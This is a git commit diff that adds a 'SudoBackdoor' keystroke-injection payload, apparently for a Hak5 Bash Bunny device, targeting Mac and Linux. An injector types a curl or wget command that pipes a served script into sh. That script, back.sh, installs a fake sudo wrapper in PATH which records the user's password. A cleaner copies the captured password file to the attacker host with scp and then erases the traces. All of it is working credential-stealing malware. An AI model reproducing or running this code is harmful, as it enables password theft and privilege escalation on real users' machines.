Added SudoBackdoor payload (#216)

* add SudoBackdoor patload * fix readme * fix readme 2 * fix readme 3 * add skip key for sc (ssh)
2025-10-29 16:58:25 +00:00 · 2017-05-12 02:55:40 +01:00 · 2017-05-12 02:55:40 +01:00 · 941180d59a
commit 941180d59a
parent bf063c1219
4 changed files with 206 additions and 0 deletions
--- a/payloads/library/credentials/SudoBackdoor/cleaner/payload.txt
+++ b/payloads/library/credentials/SudoBackdoor/cleaner/payload.txt
@ -0,0 +1,65 @@
+#!/bin/bash
+
+# Title:     SudoBackdoor{Cleaner}
+# Author:    oXis
+# Target:    Mac/Linux
+# Version:   0.1
+#
+# Get back the password grabbed by the
+# sudo backdoor and do cleanup
+#
+# White            |  Ready
+# Blue blinking    |  Attacking
+# Green            |  Finished
+
+LED SETUP
+
+#setup the attack on macos (if false, attack is for Linux)
+mac=false
+
+if [ "$mac" = true ]
+then
+    ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
+else
+    ATTACKMODE ECM_ETHERNET HID
+fi
+
+DUCKY_LANG us
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+LOOT=/root/udisk/loot/SudoBackdoor
+mkdir -p $LOOT
+
+LED ATTACK
+
+if [ "$mac" = true ]
+then
+    RUN OSX terminal
+else
+    RUN UNITY xterm
+fi
+QUACK DELAY 2000
+
+QUACK STRING scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \~/.config/sudo/sudo.conf root@$HOST_IP:$LOOT/\$USER.sudo.passwd
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING hak5bunny
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 500
+if [ "$mac" = true ]
+then
+    QUACK STRING rm -rf \~/.config/sudo \&\& sed -i \'/export PATH=\\~\\/.config\\/sudo:/d\' \~/.bash_profile
+else
+    QUACK STRING rm -rf \~/.config/sudo \&\& sed -i \'/export PATH=\\~\\/.config\\/sudo:/d\' \~/.bashrc
+fi
+QUACK ENTER
+QUACK DELAY 200
+QUACK STRING exit
+QUACK DELAY 200
+QUACK ENTER
+LED SUCCESS
--- a/payloads/library/credentials/SudoBackdoor/injector/back.sh
+++ b/payloads/library/credentials/SudoBackdoor/injector/back.sh
@ -0,0 +1,42 @@
+#!/bin/bash
+
+if [ ! -d ~/.config/sudo ]
+then
+    mkdir -p ~/.config/sudo
+fi
+
+if [ -f  ~/.config/sudo/sudo ]
+then
+    rm  ~/.config/sudo/sudo
+fi
+
+echo '#!'$SHELL >> ~/.config/sudo/sudo
+cat <<'EOF' >> ~/.config/sudo/sudo
+/usr/bin/sudo -n true 2>/dev/null
+if [ $? -eq 0 ]
+then
+    /usr/bin/sudo $@
+else
+    echo -n "[sudo] password for $USER: "
+    read -s pwd
+    echo
+    echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
+    if [ $? -eq 1 ]
+    then
+	echo "$USER:$pwd:invalid" >> ~/.config/sudo/sudo.config
+	echo "Sorry, try again."
+	sudo $@
+    else
+	echo "$USER:$pwd:valid" >> ~/.config/sudo/sudo.config
+	echo "$pwd" | /usr/bin/sudo -S $@
+    fi
+fi
+EOF
+
+chmod u+x ~/.config/sudo/sudo
+if [ -f ~/.bash_profile ]
+then
+    echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
+else
+    echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
+fi
--- a/payloads/library/credentials/SudoBackdoor/injector/payload.txt
+++ b/payloads/library/credentials/SudoBackdoor/injector/payload.txt
@ -0,0 +1,67 @@
+#!/bin/bash
+
+# Title:     SudoBackdoor{Injector}
+# Author:    oXis
+# Target:    Mac/Linux
+# Version:   0.1
+#
+# Inject a sudo backdoor by installing a wrapper
+# inside .config/sudo/ and sourcing the dir
+# in the $PATH.
+#
+# White            |  Ready
+# Ammber blinking  |  Waiting for server
+# Blue blinking    |  Attacking
+# Green            |  Finished
+
+LED SETUP
+
+#setup the attack on macos (if false, attack is for Linux)
+mac=false
+
+if [ "$mac" = true ]
+then
+    ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
+else
+    ATTACKMODE ECM_ETHERNET HID
+fi
+
+DUCKY_LANG us
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+
+# starting server
+LED SPECIAL
+
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening (credit audibleblink)
+while ! nc -z localhost 80; do sleep 0.2; done
+
+LED ATTACK
+
+if [ "$mac" = true ]
+then
+    RUN OSX terminal
+else
+    RUN UNITY xterm
+fi
+QUACK DELAY 2000
+
+if [ "$mac" = true ]
+then
+    QUACK STRING curl "http://$HOST_IP/back.sh" \| sh
+else
+    QUACK STRING wget "http://$HOST_IP/back.sh" \| sh
+fi
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 200
+QUACK STRING exit
+QUACK DELAY 200
+QUACK ENTER
+LED SUCCESS
--- a/payloads/library/credentials/SudoBackdoor/readme.md
+++ b/payloads/library/credentials/SudoBackdoor/readme.md
@ -0,0 +1,32 @@
+# SudoBackdoor
+
+* Author: oXis
+* Version: 0.1
+* Target: Mac/Linux
+
+## Description
+
+Injector: Inject a sudo backdoor by installing a wrapper inside .config/sudo/ and sourcing the dir in the $PATH.    
+Cleaner: Get back the password grabbed by the sudo backdoor and do cleanup.    
+
+## Configuration
+
+Inside the injector and the cleaner you can specify mac=true to switch the playload to macos mode.    
+
+## STATUS
+Injector
+
+| LED              | Status               |
+| ---------------- | -------------------- |
+| White            |  Ready               |
+| Ammber blinking  |  Waiting for server  |
+| Blue blinking    |  Attacking           |
+| Green            |  Finished            |
+    
+Cleaner
+
+| LED              | Status               |
+| ---------------- | -------------------- |
+| White            |  Ready               |
+| Blue blinking    |  Attacking           |
+| Green            |  Finished            |